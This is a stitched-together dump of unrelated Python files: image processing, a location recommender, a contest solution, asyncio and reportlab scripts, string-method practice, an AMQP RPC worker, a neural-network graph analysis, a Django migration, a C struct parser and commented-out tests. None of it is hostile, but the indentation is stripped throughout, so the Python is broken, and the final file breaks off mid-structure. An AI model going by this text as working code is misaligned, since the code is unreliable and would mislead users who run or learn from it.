arr_cx = int(arr_moments['m10'] / arr_moments['m00'])
arr_cy = int(arr_moments['m01'] / arr_moments['m00'])
if arr_cy > arr_rect[0][0] + arr_rect[1][1] / 2:
print("up")
else:
print("down")
print(arr_rect[0][1] + arr_rect[1][1] / 2)
hsv_values = dict(
white=((0, 0, 191.25), (180, 25.5, 255)), lightgrey=((0, 0, 127.5), (255, 255, 191.25)),
darkgrey=((0, 0, 63.75), (255, 255, 127.5)), black=((0, 0, 0), (255, 255, 63.75)),
red=((170, 20, 20), (5, 255, 255)), pink=((135, 20, 20), (170, 255, 255)),
purple=((115, 20, 20), (135, 255, 255)), blue=((100, 20, 20), (115, 255, 255)),
lblue=((92.5, 20, 20), (100, 255, 255)), green=((60, 20, 20), (92.5, 255, 255)),
yellow=((25, 20, 20), (60, 255, 255)), orange=((10, 20, 20), (20, 255, 255)),
color=((0, 20, 20), (180, 255, 255))
)
|
# Author : Xiang Xu
# -*- coding: utf-8 -*-
from math import sqrt
dataset = {}
def get_dataset(amount):
global dataset
totalCheckinsFile = open('Gowalla_totalCheckins.txt', 'r')
user = ''
for line in totalCheckinsFile:
token = line.strip().split('\t')
if token[0] != user and len(dataset) == amount:
totalCheckinsFile.close()
return
user = token[0]
dataset.setdefault(user, {})
location = token[-1]
dataset[user].setdefault(location, 0)
dataset[user][location] += 1
def similarity_score(person1, person2):
# Returns ratio Euclidean distance score of person1 and person2
both_viewed = {} # To get both rated items by person1 and person2
for item in dataset[person1]:
if item in dataset[person2]:
both_viewed[item] = 1
# Conditions to check they both have an common rating items
if len(both_viewed) == 0:
return 0
# Finding Euclidean distance
sum_of_eclidean_distance = []
for item in dataset[person1]:
if item in dataset[person2]:
sum_of_eclidean_distance.append(pow(dataset[person1][item] - dataset[person2][item],2))
sum_of_eclidean_distance = sum(sum_of_eclidean_distance)
return 1/(1+sqrt(sum_of_eclidean_distance))
def most_similar_users(person, number_of_users):
# returns the number_of_users (similar persons) for a given specific person.
scores = [(pearson_correlation(person,other_person),other_person) for other_person in dataset if other_person != person ]
# Sort the similar persons so that highest scores person will appear at the first
scores.sort()
scores.reverse()
return scores[0:number_of_users]
def pearson_correlation(person1, person2):
"""
Calculate similarity between two person,
use Ajusted Cosine algorithm
"""
# To get both interested items
both_rated = {}
for item in dataset[person1]:
if item in dataset[person2]:
both_rated[item] = 1
number_of_ratings = len(both_rated)
# Checking for number of ratings in common
if number_of_ratings == 0:
return 0
# Add up all the preferences of each user
p1_rated_sum = sum([dataset[person1][item] for item in both_rated])
p2_rated_sum = sum([dataset[person2][item] for item in both_rated])
# Sum up the squares of preferences of each user
p1_rated_square_sum = sum([pow(dataset[person1][item],2) for item in both_rated])
p2_rated_square_sum = sum([pow(dataset[person2][item],2) for item in both_rated])
# Sum up the product value of both preferences for each item
product_sum_of_both_users = sum([dataset[person1][item] * dataset[person2][item] for item in both_rated])
# Calculate the numerator and denominator
numerator = product_sum_of_both_users - (p1_rated_sum * p2_rated_sum / number_of_ratings)
denominator = sqrt((p1_rated_square_sum - pow(p1_rated_sum,2) / number_of_ratings) * (p2_rated_square_sum - pow(p2_rated_sum,2) / number_of_ratings))
if denominator == 0:
return 0
else:
result = numerator / denominator
return result
def user_reommendations(person):
"""
Recommend person for locations with Collaborative Filtering algorithm
"""
# Gets recommendations for a person by using a weighted average of every other user's rankings
totals = {}
simSums = {}
for other in dataset:
if other != person:
sim = pearson_correlation(person,other)
# ignore scores of zero or lower
if sim <=0:
continue
for item in dataset[other]:
# only score movies i haven't seen yet
if item not in dataset[person] or dataset[person][item] == 0:
# Similrity * score
totals.setdefault(item,0)
totals[item] += dataset[other][item]* sim
# sum of similarities
simSums.setdefault(item,0)
simSums[item] += sim
rankings = [(total/simSums[item],item) for item,total in totals.items()]
rankings.sort()
rankings.reverse()
recommendataions_list = [recommend_item for score,recommend_item in rankings]
if len(recommendataions_list) > 10: recommendataions_list = recommendataions_list[:10]
return recommendataions_list
if __name__ == '__main__':
get_dataset(100)
for user in dataset.keys():
rlist = user_reommendations(user)
print "recommend user {0} for theses locations: {1}".format(user, ' '.join(rlist))
|
# cook your dish here
X, Y, Z = input().split()
X = int(X)
Y = int(Y)
Z = int(Z)
action = 0
while(True):
if X == Y and Y == Z:
action = -1
break
elif X%2 == 0 and Y%2 == 0 and Z%2 == 0:
temp_X = int(Y/2) + int(Z/2)
temp_Y = int(X/2) + int(Z/2)
temp_Z = int(X/2) + int(Y/2)
action = action + 1
else:
break
X = temp_X
Y = temp_Y
Z = temp_Z
print(action)
|
import logging
import collections
import datetime
import asyncio
import unittest
import os
from subprocess import call
from pathlib import Path
from rdflib import URIRef, Literal, Graph, ConjunctiveGraph, Dataset
from aiohttp_rdf4j.aiograph import AioRDF4jStore, AioRDF4jServer
from aiohttp_rdf4j.utils import async_fill_graph
from contextlib import contextmanager
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler())
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
logger.info("uvloop activated")
except ImportError:
logger.info("uvloop not activated")
THIS_DIR = Path(__file__).parent
async def async_gen(iterable):
"""
Is this non blocking?
:param iterable: a iterable without __aiter__
:return: an async generator for the iterable
"""
for i in iterable:
await asyncio.sleep(0)
yield i
def ml(l):
return [(i) for i in range(l)]
l1 =ml(1000)
l2 =ml(10000)
l3 = ml(500)
async def f(l, id):
async for i in async_gen(l):
if i%10 == 0:
print(i, id)
#print("finished", id)
print(i, id)
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(f(l1,1), f(l2, 2), f(l3, 3)))
loop.close()
|
#!/usr/bin/python2
# encoding: utf8
from __future__ import division
import reportlab
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import A4
from reportlab.lib.units import cm,mm
from math import *
from reportlab.lib.colors import *
def rect(c,x1,y1,x2,y2):
p = c.beginPath()
p.moveTo(x1,y1)
for x,y in [(x2,y1),(x2,y2),(x1,y2)]:
p.lineTo(x,y)
p.close()
return p
def grid(c,nx=50,ny=70,d = 4*mm):
def set_width(i):
if i % 10 == 0:
c.setLineWidth(1.3*mm)
elif i % 5 == 0:
c.setLineWidth(0.5*mm)
else:
c.setLineWidth(0.1*mm)
clipp_rect = rect(c,0,0,d*nx,d*ny)
c.setLineWidth(0.1*mm)
c.setStrokeColor(white)
c.clipPath(clipp_rect)
c.setStrokeColor(black)
for i in range(ny+1):
set_width(i)
c.line(0,i*d,nx*d,i*d) #x
for i in range(nx+1):
set_width(i)
c.line(i*d,0,i*d,ny*d) #y
c.setStrokeColor(white)
c.setLineWidth(0.3*mm)
for i in range(ny+1):
if i % 10 == 0:
c.line(0,i*d,nx*d,i*d) #x
for i in range(nx+1):
if i % 10 == 0:
c.line(i*d,0,i*d,ny*d) #y
if 0:
c.setStrokeColor(red)
c.setLineWidth(1*mm)
c.drawPath(clipp_rect)
c = canvas.Canvas("rechenpapier.pdf",pagesize=A4)
c.translate(0.5*cm,1*cm)
grid(c,nx=50,ny=70,d=4*mm)
c.showPage()
c.translate(0.5*cm,1.5*cm)
grid(c,nx=20,ny=20,d=10*mm)
c.showPage()
c.translate(0.5*cm,1.5*cm)
grid(c,nx=15,ny=15,d=12.54*mm)
c.showPage()
c.translate(0.5*cm,5*cm)
grid(c,nx=10,ny=10,d=20*mm)
c.showPage()
c.save()
|
x=23
y=34
str1="HELLO GERMANY how are you? x owe me {} y owe me {}"
print(str1.count("o"))
# print(str1.format(x,y))
#
# print(str1.center(100,"o").format(x,y))
# print(len(str1))
# print(str1[0:5])
# print(str1[24])
# #
# # print("hello" in str1)
# # print("G" not in str1)
# # print ("how" in str1)
#
# # using if
# if "how" in str1:
# print("yes")
#
# print(str1.index("G"))
# print(str1.isalnum()) |
#!/usr/bin/env python
# Author:tjy
import copy
# names = ['Tom', 'Jick', 'Alex', 'TJY']
# names.sort(key=len,reverse=False)
# names.reverse()
# if 'TJY' in names and 'tjy' not in names:
# names.remove('TJY')
# names.append('tjy')
# names.pop(1)
# names.extend(['aa.xml', 'bb', 12])
# names.insert(2, 'aa.xml')
# print(names.index('Jick'))
# names.append('kitty')
# names1 = names.copy()
# names1[-2][0] = 'jick'
# names1[0] = 'tom'
# print(names1)
# names2 = copy.copy(names)
# names2[-1][0] = 'jack'
# print(names2)
# names3 = copy.deepcopy(names)
# names3[-1][1] = 'cc'
# print(names3)
# num = names.count('tom')
# print(num)
# print(names)
str1 = 'i love python'
# print(str1.count('1'))
# print(str1.center(50,'='))
# print(str1.count('i'))
# print(str1.encode())
# print(str1.expandtabs(50))
# print(str1.endswith('on'))
# print(str1.startswith('i '))
# print(str1.find('w')) #没有找到返回-1,找了了返回索引值
# print(str1.index('l'))
# print(' '.isspace())
# print('00'.isnumeric()) # 是否为纯数字
# print('a1b2'.isalnum())
# print('1E23'.isdecimal())
# print('00'.isdigit()) # 是否为整数,包含0
# print('a12'.isidentifier()) # 是否为合法的标识符,即是否为合法的变量名
# print('a \t\ns'.islower()) # 是否为大写字母,自动忽略空格,制表符,换行符
# print('\t\nSA \t'.isupper()) # 同上
# print('df'.isprintable()) # 主要用于设备文件和驱动文件
# print('I Am A Goodmen'.istitle())
# print('|'.join(['12','23','34'])) # 列表中必须是字符串
# print('\n'.join(('a', 'b'))) # 也可以是tuple
# print('\n'.join('hello')) # 字符串
# print('\n'.join({'name':"tjy", 'age':18})) #字典只取key值
#
# b = 'a'.rjust(50,'=')
# print(b)
# print(len(b))
# print(str)
# print('djsk fsd\r\nfdfd'.split('\n'))
# print('djsk fsd\r\nfdfd'.splitlines()) # \r\n 和 \n 都可以作为分隔符
# print('djsk fsd\nfdfd'.splitlines())
# b = '\nfjdk\t\n\r'.strip()
# print(b)
# print(len(b))
# print('faS dfs1'.swapcase()) # 大小写交互,数字不变
# print('i am a boy'.title()) # 变为标题
# b = str.maketrans('abcd1234','hijklmn0')
# print('aa123fd'.translate(b))
# print('i am a boy'.partition('a'))
# print('is is '.replace('is','are'))
# print('is a good boy,is'.rindex('is'))
|
#!/usr/bin/env python3
import AmqpConnector
import msgpack
import logging
import os.path
import threading
import ssl
import time
import traceback
RUN_STATE = True
class RpcHandler(object):
die = False
def __init__(self, settings):
thName = threading.current_thread().name
if "-" in thName:
logPath = "Main.Thread-{num}.RPC".format(num=thName.split("-")[-1])
else:
logPath = 'Main.RPC'
self.log = logging.getLogger(logPath)
self.log.info("RPC Management class instantiated.")
self.settings = settings
# Require clientID in settings
assert 'clientid' in settings
assert "RABBIT_LOGIN" in settings
assert "RABBIT_PASWD" in settings
assert "RABBIT_SRVER" in settings
assert "RABBIT_VHOST" in settings
if not self.settings:
raise ValueError("The 'settings.json' file was not found!")
self.cert = self.findCert()
def findCert(self):
'''
Verify the SSL cert exists in the proper place.
'''
curFile = os.path.abspath(__file__)
curDir = os.path.split(curFile)[0]
certPath = os.path.join(curDir, './deps/cacert.pem')
assert os.path.exists(certPath)
return certPath
def process(self, body):
raise ValueError("This must be subclassed!")
def _process(self, body):
# body = json.loads(body)
body = msgpack.unpackb(body, use_list=True, encoding='utf-8')
assert isinstance(body, dict) == True, 'The message must decode to a dict!'
delay = None
try:
if 'postDelay' in body:
delay = int(body['postDelay'])
self.log.info("Received request. Processing.")
ret = self.process(body)
assert isinstance(ret, dict) == True, '`process()` call in child-class must return a dict!'
# Copy the jobid and dbid across, so we can cross-reference the job
# when it's received.
if 'jobid' in body:
ret['jobid'] = body['jobid']
if not 'success' in ret:
ret['success'] = True
if not 'cancontinue' in ret:
ret['cancontinue'] = True
self.log.info("Processing complete. Submitting job with id '%s'.", ret['jobid'])
except Exception:
ret = {
'success' : False,
'error' : "unknown",
'traceback' : traceback.format_exc(),
'cancontinue' : True
}
if 'jobid' in body:
ret['jobid'] = body['jobid']
self.log.error("Had exception?")
for line in traceback.format_exc().split("\n"):
self.log.error(line)
# Disable the delay if the call had an exception.
delay = 0
if not 'cancontinue' in ret:
self.log.error('Invalid return value from `process()`')
elif not ret['cancontinue']:
self.log.error('Uncaught error in `process()`. Exiting.')
self.die = True
ret['user'] = self.settings['clientid']
self.log.info("Returning")
return msgpack.packb(ret, use_bin_type=True), delay
# return json.dumps(ret), delay
def successDelay(self, sleeptime):
'''
Delay for `sleeptime` seconds, but output a "Oh hai, I'm sleeping" message
every 15 seconds while doing so.
Also, return immediately if told to exit.
'''
if sleeptime and not self.die and RUN_STATE:
self.log.info("Sleeping %s seconds.", sleeptime)
for x in range(sleeptime):
time.sleep(1)
if (sleeptime - x) % 15 == 0:
self.log.info("Sleeping %s more seconds....", sleeptime - x)
if not RUN_STATE:
self.log.info( "Breaking due to exit flag being set")
break
def processEvents(self):
'''
Connect to the server, wait for a task, and then disconnect untill another job is
received.
The AMQP connection is not maintained due to issues with long-lived connections.
'''
if self.cert:
sslopts = {"cert_reqs" : ssl.CERT_REQUIRED, "ca_certs" : self.cert}
else:
sslopts = None
shutdownType = "dirty"
try:
while RUN_STATE and not self.die:
try:
connector = AmqpConnector.Connector(userid = self.settings["RABBIT_LOGIN"],
password = self.settings["RABBIT_PASWD"],
host = self.settings["RABBIT_SRVER"],
virtual_host = self.settings["RABBIT_VHOST"],
ssl = sslopts,
session_fetch_limit = 1,
durable = True,
)
except IOError:
self.log.error("Error while connecting to server.")
self.log.error("Is the AMQP server not available?")
for line in traceback.format_exc().split("\n"):
self.log.error(line)
self.log.error("Trying again in 30 seconds.")
time.sleep(30)
continue
self.log.info("Connection Established. Awaiting RPC requests")
while RUN_STATE and not self.die:
message = connector.getMessage()
if message:
self.log.info("Processing message.")
response, postDelay = self._process(message)
self.log.info("Response message size: %0.3fK. Sending", int(len(response)/1024))
connector.putMessage(response)
break
time.sleep(0.1)
self.log.info("Closing RPC queue connection.")
connector.stop()
self.successDelay(postDelay)
except KeyboardInterrupt:
self.log.info("Keyboard Interrupt exit!")
self.die = True
self.log.info("Halting message consumer.")
try:
connector.stop()
except Exception:
self.log.error("Closing the connector produced an error!")
for line in traceback.format_exc().split("\n"):
self.log.error(line)
self.log.info("Closed. Exiting")
if not RUN_STATE or self.die:
raise KeyboardInterrupt
|
from .LastVersionDetector import LastVersionDetector
|
import networkx as nx
import matplotlib.pyplot as plt
import csv
import pandas
import random
import pickle
import numpy as np
from statistics import median
G = nx.read_graphml("data/c.elegans.herm_pharynx_1.graphml")
timesteps = 500
simulation_no = 100
timedelay_range = 20
probabilityData = {}
def nodeDegreeClassification(G, median):
averageEdges = G.number_of_edges() / G.number_of_nodes()
highCounter = 0
for n,nbrs in G.adjacency_iter():
if G.degree(n) > median:
G.node[n]['degreeClass'] = 'High'
highCounter += 1
else:
G.node[n]['degreeClass'] = 'Low'
hubFraction = float(highCounter) / G.number_of_nodes()
return hubFraction, highCounter
def medianDegree(G):
degrees = [0] * G.number_of_nodes()
i = 0
for n,nbrs in G.adjacency_iter():
degrees[i] = G.degree(n)
i += 1
return median(degrees)
median = medianDegree(G)
print median
hubFraction = nodeDegreeClassification(G, median)
with open('data/randomResults/dTEdata_chem.txt', 'rb') as f:
dTE = pickle.load(f)
def SM(G, dTE, timedelay):
SM = {}
for h in range(1, timedelay):
dTE_S = 0
dTE_M = 0
SCount = 0
MCount = 0
SM[h] = {}
for i,nbrs1 in G.adjacency_iter():
for j,nbrs2 in G.adjacency_iter():
if h in dTE and i in dTE[h] and j in dTE[h][i]:
if G.node[i]['role'] == 'S':
dTE_S += dTE[h][i][j]
SCount += 1
elif G.node[i]['role'] == 'M':
dTE_M += dTE[h][i][j]
MCount += 1
if SCount == 0:
SM[h] = 0
else:
average_dTE_S = float(dTE_S)/float(SCount)
average_dTE_M = float(dTE_M)/float(MCount)
SM[h] = average_dTE_S - average_dTE_M
print SM[h]
return SM
SM = SM(G, dTE, timedelay_range)
x = SM.keys()
y = SM.values()
fig, ax = plt.subplots()
line1, = ax.plot(x, y, linewidth=1,)
plt.axis([0, 20, -0.10, 0.50])
fig.suptitle('Sensor - Motor Value ', fontsize=14)
plt.ylabel('SM Value')
plt.xlabel('Time Delay h')
plt.show()
'''
def HL(G, dTE, timedelay):
HL = {}
for h in range(1, timedelay):
dTE_high = 0
dTE_low = 0
highCount = 0
lowCount = 0
HL[h] = {}
for i,nbrs1 in G.adjacency_iter():
for j,nbrs2 in G.adjacency_iter():
if h in dTE and i in dTE[h] and j in dTE[h][i]:
#print G.node[i]['degreeClass']
if G.node[i]['degreeClass'] == 'High':
dTE_high += dTE[h][i][j]
highCount += 1
else:
dTE_low += dTE[h][i][j]
lowCount += 1
if highCount == 0:
HL[h] = 0
else:
average_dTE_high = float(dTE_high)/float(highCount)
average_dTE_low = float(dTE_low)/float(lowCount)
HL[h] = average_dTE_high - average_dTE_low
return HL
HL = HL(G, dTE, timedelay_range)
with open('data/randomResults/HLdata_chem.txt', 'wb') as f:
pickle.dump(HL, f)
x = HL.keys()
y = HL.values()
fig, ax = plt.subplots()
line1, = ax.plot(x, y, linewidth=1,)
plt.axis([0, 20, -0.20, 0.20])
fig.suptitle('Hub - Non-Hub Value ', fontsize=14)
plt.ylabel('HN Value')
plt.xlabel('Time Delay h')
plt.show()
'''
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
list=[1,2,3,4,5,6,7,8,9]
list2=[i for i in list if i%3==0 ]
print (list2)
import time
#带有不定参的装饰器
def deco(func):
def wrapper(*args,**kwargs):
startTime=time.time()
func(*args,**kwargs)
endTime=time.time()
msecs=(endTime-startTime)*1000
print ("time is {0} ms ".format(msecs))
return wrapper
@deco
def func(a,b):
print ("hello, here is a func for add :")
time.sleep(1)
print ("result is %d"%(a+b))
@deco
def func2(a,b,c):
print ("hello,here is a func for add:")
time.sleep(1)
print ("result is %d"%(a+b+c))
def deco01(func):
def wrapper(*args, **kwargs):
print("this is deco01")
startTime = time.time()
func(*args, **kwargs)
endTime = time.time()
msecs = (endTime - startTime)*1000
print("time is %d ms" %msecs)
print("deco01 end here")
return wrapper
def deco02(func):
def wrapper(*args, **kwargs):
print("this is deco02")
func(*args, **kwargs)
print("deco02 end here")
return wrapper
#多个装饰器
@deco01
@deco02
def func3(a,b):
print("hello,here is a func for add :")
time.sleep(1)
print("result is %d" %(a+b))
if __name__=='__main__':
#f=func
#func2(3,4,5)
# f(3,4)
func3(4,5)
|
# Generated by Django 2.2.3 on 2019-11-01 19:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('basket', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='order',
name='customer_apartment',
field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Квартира'),
),
migrations.AlterField(
model_name='order',
name='customer_dist',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Улица'),
),
migrations.AlterField(
model_name='order',
name='customer_email',
field=models.EmailField(max_length=254, verbose_name='emial'),
),
migrations.AlterField(
model_name='order',
name='customer_house',
field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Дом'),
),
migrations.AlterField(
model_name='order',
name='customer_locality',
field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Населенный пункт'),
),
migrations.AlterField(
model_name='productinbasket',
name='color',
field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Цвет'),
),
migrations.AlterField(
model_name='productinbasket',
name='size',
field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Размер'),
),
migrations.AlterField(
model_name='productinorders',
name='color',
field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Цвет'),
),
migrations.AlterField(
model_name='productinorders',
name='size',
field=models.CharField(blank=True, max_length=30, null=True, verbose_name='Размер'),
),
]
|
#!/usr/bin/env python3
from structurefield import StructureField
import re
# TODO: replace by libclang
__comments_multiline_re = re.compile(r'/\*.*?\*/', re.DOTALL)
__comments_singleline_re = re.compile(r'//.*$', re.MULTILINE)
__unused_keywords_re = re.compile(r'static|const|extern|inline|virtual|volatile|typedef|__attribute__\(\(.*\)\)')
__extra_spaces_re = re.compile(r'[\s]+')
def remove_comments(code):
code = __comments_singleline_re.sub("", code)
code = __comments_multiline_re.sub("", code)
return code
def remove_keywords(code):
return __unused_keywords_re.sub("", code)
def remove_spaces(code):
return __extra_spaces_re.sub(" ", code)
def find_matching_paren(code, open_paren='{', close_paren='}'):
''' Returns the index of the closing parenthesis matching the opening one. '''
unmatched_paren_count = 0
for i in range(len(code)):
if code[i] == open_paren:
unmatched_paren_count += 1
elif code[i] == close_paren:
unmatched_paren_count -= 1
if unmatched_paren_count == 0:
return i
return -1
def find_first_substructure(code):
""" Returns the indexes of the first embedded structure found in the declarations. """
start_subexpr = code.find('{')
# no embedded struct found
if start_subexpr == -1:
return (-1, -1)
end_subexpr = find_matching_paren(code)
if end_subexpr == -1:
raise SyntaxError("invalid syntax - no match for opening parenthesis "
"in '{0}', start: {1}".format(code, start_subexpr))
return (start_subexpr, end_subexpr)
def get_struct_name(code, start_subexpr, end_subexpr):
""" Get the name of a structure given the positions of its open & close parentheses. """
struct_name = ""
# find expression just before this struct
prev_expr = code.rfind(';', 0, start_subexpr)
if prev_expr != -1:
name_start = prev_expr + 1
struct_name += code[name_start : start_subexpr - 1]
# does not handle the case of this struct being the first substruct in the code
# the calling function takes care to not include the enclosing struct declaration
elif start_subexpr > 0:
struct_name += code[:start_subexpr - 1]
# find expression just after this struct
next_expr = code.find(';', end_subexpr)
if next_expr != -1:
name_end = next_expr
struct_name += code[end_subexpr + 1 : name_end]
next_expr += 1
else:
raise SyntaxError("semicolon missing at end of structure - "
"'{0}'".format(code[prev_expr+1:]))
struct_name = struct_name.lstrip().rstrip()
return (prev_expr, next_expr, struct_name)
def parse_expr(code):
""" Parse a set of declarations and return a list of StructureFields.
Partitions the declaration into 3 -
before first sub-structure, first sub-structure, and after first sub-structure.
Then recursively calls itself to parse the partitioned bits.
struct ABC { char c; struct XYZ { int b; char y; } myXYZ; int l; } myABC;
^ ^ ^ ^
1 2 3 4
1 - prev_expr
2 - start_substruct
3 - end_substruct
4 - next_expr
"""
fields_list = []
code = code.lstrip().rstrip()
if len(code) == 0:
return fields_list
(start_substruct, end_substruct) = find_first_substructure(code)
# no substructures found
if start_substruct == -1:
fields = code.split(';')[:-1]
# FIXME: handle comma separated fields
# FIXME: handle unions
fields_list = [ StructureField.create_from_string(f) for f in fields]
return fields_list
(prev_expr, next_expr, struct_name) = get_struct_name(code, start_substruct, end_substruct)
fields_list.extend(parse_expr(code[:prev_expr + 1]))
struct_fields = parse_expr(code[start_substruct + 1:end_substruct])
fields_list.append((struct_name, struct_fields))
fields_list.extend(parse_expr(code[next_expr:]))
return fields_list
def parse_c_struct(code):
""" Parses a C structure declaration to generate a list of fields. """
# convert to unix style newlines
code = code.replace('\r', '\n')
code = remove_comments(code)
code = remove_keywords(code)
code = remove_spaces(code)
return parse_expr(code)
|
from datetime import date
from unittest import mock
import numpy as np
import pytest
from summer.model import CompartmentalModel
# from autumn.projects.covid_19.mixing_optimisation import mixing_opti as opti
# from autumn.projects.covid_19.mixing_optimisation import write_scenarios
# from autumn.projects.covid_19.mixing_optimisation.constants import OPTI_REGIONS, PHASE_2_START_TIME
from autumn.settings import Region
@pytest.mark.mixing_optimisation
def test_dummy_placeholder():
pass
#
#
# @pytest.mark.local_only
# @pytest.mark.parametrize("region", Region.MIXING_OPTI_REGIONS)
# @mock.patch("models.covid_19.mixing_optimisation.mixing_opti.PHASE_2_START_TIME", 100)
# def test_run_root_models_partial(region):
# """
# Smoke test: ensure we can build and run each root model with nothing crashing.
# """
# model = opti.run_root_model(region)
# assert type(model) is CompartmentalModel
# assert model.outputs is not None
#
#
# @pytest.mark.github_only
# @pytest.mark.mixing_optimisation
# @pytest.mark.parametrize("region", Region.MIXING_OPTI_REGIONS)
# def test_run_root_models_full(region):
# """
# Smoke test: ensure we can build and run each root model with nothing crashing.
# """
# model = opti.run_root_model(region)
# assert type(model) is CompartmentalModel
# assert model.outputs is not None
#
#
# AGE_GROUPS = [
# "0",
# "5",
# "10",
# "15",
# "20",
# "25",
# "30",
# "35",
# "40",
# "45",
# "50",
# "55",
# "60",
# "65",
# "70",
# "75",
# ]
# AVAILABLE_MODES = [
# "by_age",
# "by_location",
# ]
# AVAILABLE_DURATIONS = ["six_months", "twelve_months"]
# DECISION_VARS = {
# "by_age": [1 for _ in range(len(AGE_GROUPS))],
# "by_location": [1, 1, 1],
# }
#
#
# @pytest.mark.mixing_optimisation
# @pytest.mark.github_only
# @pytest.mark.parametrize("duration", AVAILABLE_DURATIONS)
# @pytest.mark.parametrize("mode", AVAILABLE_MODES)
# def test_full_optimisation_iteration_for_uk(mode, duration):
# country = Region.UNITED_KINGDOM
# root_model = opti.run_root_model(country)
# h, d, yoll = opti.objective_function(DECISION_VARS[mode], root_model, mode, country, duration)
# assert h in (True, False)
# assert d >= 0
# assert yoll >= 0
#
#
# @pytest.mark.parametrize("duration", AVAILABLE_DURATIONS)
# @pytest.mark.parametrize("mode", AVAILABLE_MODES)
# def test_build_params_for_phases_2_and_3__smoke_test(mode, duration):
# opti.build_params_for_phases_2_and_3(
# DECISION_VARS[mode], elderly_mixing_reduction=None, duration=duration, mode=mode
# )
#
#
# @mock.patch("models.covid_19.mixing_optimisation.mixing_opti.Scenario")
# def test_objective_function_calculations(mock_scenario_cls):
# root_model = mock.Mock()
# sc_model = mock.Mock()
# mock_scenario_cls.return_value.model = sc_model
# phase_2_days = 183
# phase_3_days = 14 + 10
# num_timesteps = PHASE_2_START_TIME + phase_2_days + phase_3_days
# sc_model.times = np.array(range(num_timesteps))
# sc_model.derived_outputs = {
# # Expect 55 deaths as sum of vals.
# "infection_deaths": np.concatenate(
# [np.zeros(PHASE_2_START_TIME), np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])],
# ),
# # Expect 108 yoll as sum of vals.
# "years_of_life_lost": np.concatenate(
# [np.zeros(PHASE_2_START_TIME), np.array([1, 3, 5, 7, 9, 11, 13, 17, 19, 23])],
# ),
# # Expect immunity because incidence decreasing
# "incidence": np.concatenate(
# [
# np.zeros(PHASE_2_START_TIME + phase_2_days + 14),
# np.array([10, 9, 8, 7, 6, 5, 4, 3, 2, 1]),
# ],
# ),
# }
# # Expect 10% immune.
# sc_model.compartment_names = ["a", "b_recovered", "c_recovered"]
# sc_model.outputs = np.zeros([num_timesteps, 3])
# sc_model.outputs[PHASE_2_START_TIME + phase_2_days, 0] = 90
# sc_model.outputs[PHASE_2_START_TIME + phase_2_days, 1] = 3
# sc_model.outputs[PHASE_2_START_TIME + phase_2_days, 2] = 7
#
# decision_variables = [1 for _ in range(len(AGE_GROUPS))]
# (herd_immunity, total_nb_deaths, years_of_life_lost,) = opti.objective_function(
# decision_variables,
# root_model,
# mode="by_age",
# country="france",
# duration="six_months",
# )
# assert herd_immunity
# assert total_nb_deaths == 55
# assert years_of_life_lost == 108
#
#
# @pytest.mark.xfail
# def test_build_params_for_phases_2_and_3__with_location_mode_and_microdistancing():
# scenario_params = opti.build_params_for_phases_2_and_3(
# decision_variables=[2, 3, 5],
# elderly_mixing_reduction=None,
# duration="six_months",
# mode="by_location",
# )
# loc_dates = [date(2020, 7, 31), date(2021, 1, 31), date(2021, 2, 1)]
#
# assert scenario_params == {
# "time": {
# "start": 213,
# "end": 669,
# },
# "mobility": {
# "age_mixing": {},
# "microdistancing": {"behaviour": {"parameters": {"sigma": 1.0}}},
# "mixing": {
# "other_locations": {
# "times": loc_dates,
# "values": [2, 2, 1.0],
# "append": False,
# },
# "school": {
# "times": loc_dates,
# "values": [3, 3, 1.0],
# "append": False,
# },
# "work": {
# "times": loc_dates,
# "values": [5, 5, 1.0],
# "append": False,
# },
# },
# },
# "importation": {
# "props_by_age": None,
# "movement_prop": None,
# "quarantine_timeseries": {"times": [], "values": []},
# "case_timeseries": {
# "times": [397, 398, 399, 400],
# "values": [0, 5, 5, 0],
# },
# },
# }
#
#
# @pytest.mark.xfail
# def test_build_params_for_phases_2_and_3__with_age_mode():
# scenario_params = opti.build_params_for_phases_2_and_3(
# decision_variables=[i for i in range(16)],
# elderly_mixing_reduction=None,
# duration="six_months",
# mode="by_age",
# )
# age_dates = [date(2020, 7, 31), date(2020, 8, 1), date(2021, 1, 31), date(2021, 2, 1)]
# loc_dates = [date(2020, 7, 31), date(2021, 1, 31), date(2021, 2, 1)]
#
# assert scenario_params == {
# "time": {
# "start": 213,
# "end": 669,
# },
# "mobility": {
# "age_mixing": {
# "0": {"values": [1, 0, 0, 1], "times": age_dates},
# "5": {"values": [1, 1, 1, 1], "times": age_dates},
# "10": {"values": [1, 2, 2, 1], "times": age_dates},
# "15": {"values": [1, 3, 3, 1], "times": age_dates},
# "20": {"values": [1, 4, 4, 1], "times": age_dates},
# "25": {"values": [1, 5, 5, 1], "times": age_dates},
# "30": {"values": [1, 6, 6, 1], "times": age_dates},
# "35": {"values": [1, 7, 7, 1], "times": age_dates},
# "40": {"values": [1, 8, 8, 1], "times": age_dates},
# "45": {"values": [1, 9, 9, 1], "times": age_dates},
# "50": {"values": [1, 10, 10, 1], "times": age_dates},
# "55": {"values": [1, 11, 11, 1], "times": age_dates},
# "60": {"values": [1, 12, 12, 1], "times": age_dates},
# "65": {"values": [1, 13, 13, 1], "times": age_dates},
# "70": {"values": [1, 14, 14, 1], "times": age_dates},
# "75": {"values": [1, 15, 15, 1], "times": age_dates},
# },
# "mixing": {
# "other_locations": {
# "times": loc_dates,
# "values": [1.0, 1.0, 1.0],
# "append": False,
# },
# "school": {
# "times": loc_dates,
# "values": [1.0, 1.0, 1.0],
# "append": False,
# },
# "work": {
# "times": loc_dates,
# "values": [1.0, 1.0, 1.0],
# "append": False,
# },
# },
# },
# "importation": {
# "props_by_age": None,
# "movement_prop": None,
# "quarantine_timeseries": {"times": [], "values": []},
# "case_timeseries": {
